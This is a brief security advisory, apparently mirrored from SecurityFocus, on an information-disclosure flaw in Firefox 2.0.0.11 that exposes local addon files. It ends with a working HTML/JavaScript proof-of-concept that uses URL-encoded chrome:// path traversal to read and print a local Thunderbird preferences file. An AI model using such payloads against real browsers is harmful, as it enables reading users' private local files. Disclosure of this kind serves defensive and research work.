11 lines
No EOL
890 B
Text
11 lines
No EOL
890 B
Text
source: https://www.securityfocus.com/bid/27406/info
|
|
|
|
Mozilla Firefox is prone to an information-disclosure vulnerability because it fails to restrict access to local JavaScript, images and stylesheets files.
|
|
|
|
Attackers can exploit this issue to gain access to potentially sensitive information that could aid in further attacks.
|
|
|
|
Firefox 2.0.0.11 is vulnerable; other versions may also be affected.
|
|
|
|
NOTE: For an exploit to succeed, a user must have an addon installed that does not store its contents in a '.jar' file. The attacker would have to target a specific addon that uses "flat" packaging.
|
|
|
|
<script>pref = function(x, y){document.write(x + ' -> ' + y + '<br>');};</script> <script src='chrome://downbar/content/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fProgram%20Files%2fMozilla%20Thunderbird%2fgreprefs%2fall.js'></script> |